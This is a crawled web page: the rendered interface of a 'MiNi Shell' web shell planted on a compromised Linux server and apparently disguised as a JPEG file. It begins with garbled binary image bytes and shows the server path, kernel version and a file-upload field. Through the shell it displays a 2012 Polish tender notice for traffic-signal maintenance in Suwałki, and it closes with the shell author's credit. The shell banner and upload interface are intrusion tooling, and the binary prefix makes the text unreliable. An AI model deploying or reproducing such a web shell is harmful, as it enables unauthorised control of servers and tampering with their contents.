JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120615/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120615/204238-N-2012.html

<p class="kh_header"><b>Suwałki: Utrzymanie i konserwacja urządzeń sygnalizacji świetlnej na terenie miasta Suwałk</b><br>
<b>Numer ogłoszenia: 204238 - 2012; data zamieszczenia: 15.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Zieleni w Suwałkach , ul. Sejneńska 84, 16-400 Suwałki, woj. podlaskie, tel. 87 566 78 55, faks 87 565 99 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdiz.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i konserwacja urządzeń sygnalizacji świetlnej na terenie miasta Suwałk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżące utrzymanie i konserwacje.
Utrzymanie stanu czystości i czytelności urządzeń i elementów sygnalizacji świetlnej: 
a)malowanie: szafek sterowników, szafek licznikowych i pośrednich, wysięgników, bram, masztów, wysięgników.
b)mycie: szafek sterowników, szafek licznikowych i pośrednich, wysięgników, bram, masztów, soczewek, odbłyśników, ekranów kontrastowych, kamer itp.  
Utrzymanie należytego stanu technicznego urządzeń sygnalizacji świetlnej: 
a)naprawa - okablowania urządzeń i urządzeń aktywnego przejścia, sygnalizatorów dźwiękowych: 
b)wymiana - daszków, soczewek, maski sygnalizatora, zamknięć komór sygnalizacyjnych, itp.
c)wymiana - żarówek, bezpieczników
Utrzymanie sterownika i urządzeń sygnalizacji świetlnej w stanie zgodnym z wymogami Przepisów Budowy Urządzeń Elektroenergetycznych (wykonanie co najmniej raz w roku kalendarzowym pomiarów rezystancji izolacji okablowania oraz skuteczności zerowania i rezystancji uziemienia urządzeń sygnalizacji świetlnej).
Utrzymanie stanu pracy sterownika zgodnego z obowiązującą dla danego skrzyżowania dokumentacją 
Utrzymanie stanu pracy skoordynowanej sterowników pracujących w ciągach zsynchronizowanych.
Dokonywanie codziennych, rutynowych przeglądów pracy i stanu technicznego urządzeń sygnalizacji na każdym skrzyżowaniu, przejściu dla pieszych (co najmniej 2 razy dziennie)
Aktualizowanie programów sygnalizacji. 
Dokonywanie korekt czasów pracy programów sygnalizacji świetlnej 
Sprawdzanie poprawności działania programów sygnalizacyjnych na skrzyżowaniu.
Codzienne zabezpieczenie dyspozycyjności.
Przyjmowanie zgłoszeń o nieprawidłowym funkcjonowaniu sygnalizacji świetlnej oraz natychmiastowe podejmowanie działań w kierunku usunięcia przyczyn i likwidację skutków.
Usuwanie awarii prostych np. spalenie żarówki, przepalenie bezpieczników, (zawieszenie) pracy systemu sterującego, itp.
Zabezpieczanie uszkodzonych elementów sygnalizacji po aktach wandalizmu, kolizjach drogowych i innych zdarzeniach losowych.
CZĘŚĆ II METODY I ZASADY PROWADZENIA I WYKONYWANIA ROBÓT . 
Codzienne całodobowe zabezpieczanie pełnej dyspozycyjności (także w niedziele, święta oraz pozostałe dni wolne od pracy).
Prowadzenie na bieżąco dziennika eksploatacji sygnalizacji świetlnej. Dokumentowanie każdej awarii, zleconych przez Zamawiającego prac, oraz wykonanych czynności i napraw.
Terminowe i sprawne wykonanie poleceń Zamawiającego oraz innych jednostek zarządzających ruchem drogowym na terenie miasta Suwałki i prawnie upoważnionych przez Zamawiającego (Policja) do wydawania poleceń w sprawie przełączeń sygnalizacji świetlnej. Powyższe polecenia muszą być potwierdzone zleceniem Zamawiającego w którym określony zostanie zakres, termin wykonania oraz sposób rozliczenia.  
Utrzymanie ciągłej łączności pomiędzy Wykonawcą i Zamawiającym (telefon komórkowy, telefon stacjonarny, fax) 
Usunięcie awarii prostych (pkt. 1.6) winno być dokonane w ciągu 2 godzin od chwili zgłoszenia, a zabezpieczenie awarii konstrukcji i okablowania (pkt. 1.7), winno być dokonane w ciągu 1 godziny od chwili zgłoszenia.
Prace wymienione w punkcie 1.1.1.a) muszą być wykonane raz na 12 miesięcy, natomiast prace wymienione w punkcie 1.1.1.b) muszą być wykonane raz po okresie zimowym oprócz  soczewek które należy myć wg potrzeb na żądanie Zamawiającego, jednak nie rzadziej niż co  2 miesiące. 
Harmonogram prac.
Marzec - kwiecień - mycie urządzeń po okresie zimowym
Maj - malowanie elementów sygnalizacji
Do końca maja Wykonawca musi zgłosić Zamawiającemu wykonanie prac i przedstawić do odbioru. 
Prace wymienione w punkcie 1.1.3  powinny być wykonane co najmniej raz na 12 miesięcy a protokoły pomiarów niezwłocznie przekazane Zamawiającemu. Pomiary zgodnie z odpowiednimi przepisami należy wykonać w najbardziej niekorzystnym dla urządzeń elektrycznych okresie tj. na początku wiosny lub jesieni.
Wszystkie prace muszą być wykonywane zgodnie z obowiązującymi przepisami BHP, Instrukcjami Oznakowania i Sygnalizacji Świetlnej (Załączniki nr 1,2,3,4, do rozporządzenia Ministra Infrastruktury z dnia 03 lipca 2003 roku w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach oraz wymogami kultury technicznej.
We własnym zakresie Wykonawca musi dokonać zabezpieczenia i oznakowania stref prowadzonych robót, zgodnie z obowiązującą Instrukcją Oznakowania Robót Prowadzonych w Pasie Drogowym oraz utrzymać je w należytej sprawności i dobrym stanie technicznym w czasie wykonywania prac.
Wykonawca ponosi odpowiedzialność za wszelkie zawinione szkody, wynikające ze złej organizacji  i sposobu prowadzenia tych prac.
Wykonawca dysponuje kadrą techniczną min. 2 osoby przeszkolone do obsługi i serwisowania sterowników MSR 
Bez pisemnej zgody Zamawiającego, Wykonawca nie może zlecać wykonania prac objętych zamówieniem, innym osobom lub firmom.
Wszystkie prace wymienione w SIWZ muszą być wykonane w ramach wynagrodzenia ryczałtowego, zgodnie ze stawkami podanymi w formularzu cenowym oferty.
 Podstawą do wystawienia faktury miesięcznej za prace konserwatorskie będzie protokół  odbioru sporządzony przez Zamawiającego w obecności Wykonawcy 
W przypadku stwierdzenia podczas odbioru prac wystąpienia wad  w realizacji Zamawiający może:obniżyć odpowiednio wynagrodzenie w formie narzuconego w protokole odbioru upustu kwotowego lub procentowegozażądać usunięcia wad w terminie określonym przez Zamawiającego na koszt Wykonawcy. 
Termin zapłaty faktury Wykonawcy będzie wynosić do 30 dni od daty dostarczenia Zamawiającemu faktury wraz z protokołem odbioru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.22.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zapewni jako część swojej oferty wadium w wysokości: 3 800,00 zł (słownie: trzy tysiące osiemset złotych) na całość zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca dostarczy wykaz usług, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zadanie o charakterze rzeczowym porównywalnym z przedmiotem zamówienia (konserwacja lub budowa sygnalizacji) wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie, o łącznej wartości min. 200 tys. zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca dostarczy wykaz urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami:
Podnośnik montażowy samochodowy hydrauliczny - 1 szt.
Samochód dostawczy do 0,9 tony - 1 szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca dostarczy wykaz osób, które będą uczestniczyć w wykonaniu zamówienia odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami:
2 osobami uprawnionymi do pracy przy urządzeniach pod napięciem do 1kV- w tym jedna osoba wykazująca się doświadczeniem minimum pięcioletnim przy konserwacji bądź budowie sygnalizacji świetlnych  
2 osobami  przeszkolonymi do obsługi i serwisowania sterowników MSR .
Należy złożyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca dostarczy oryginał lub poświadczona przez Wykonawcę za zgodność z oryginałem kopia opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200 000,00 zł wraz z potwierdzeniem opłacenia należnej składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość wprowadzenia zmian do umowy:
1)	zmiany wynagrodzenia Wykonawcy w przypadku urzędowej zmiany stawki VAT, wartość nominalna Umowy, o której mowa w § 4 ust. 1, ulegnie odpowiedniej zmianie,
2)	Wynagrodzenie Wykonawcy może ulec zmianie (zmniejszeniu lub zwiększeniu) w sytuacji zmiany ilości urządzeń sygnalizacji świetlnej podlegającej konserwacji (w przypadku wyłączenia zepsutego oświetlenia, zainstalowania nowego oświetlenia itp.) przyjmując stawki określone w formularzu cenowym dla danego skrzyżowania, stanowiącym załącznik do umowy
3) w trakcie realizacji zamówienia Wykonawca może zmienić swoją deklarację złożoną w ofercie w pkt. 8 formularza oferty, co musi być uzasadnione na piśmie i zaakceptowane przez Zamawiającego. W takim przypadku Strony dokonają zmiany umowy w niezbędnym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdiz.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Zieleni w Suwałkach,
ul. Sejneńska 84, 16-400  Suwałki
ww.zdiz.suwalki.pl 
przetargi@zdiz.suwalki.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2012 godzina 10:00, miejsce: Zarząd Dróg i Zieleni w Suwałkach,
ul. Sejneńska 82, 16-400  Suwałki
pokój 115.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com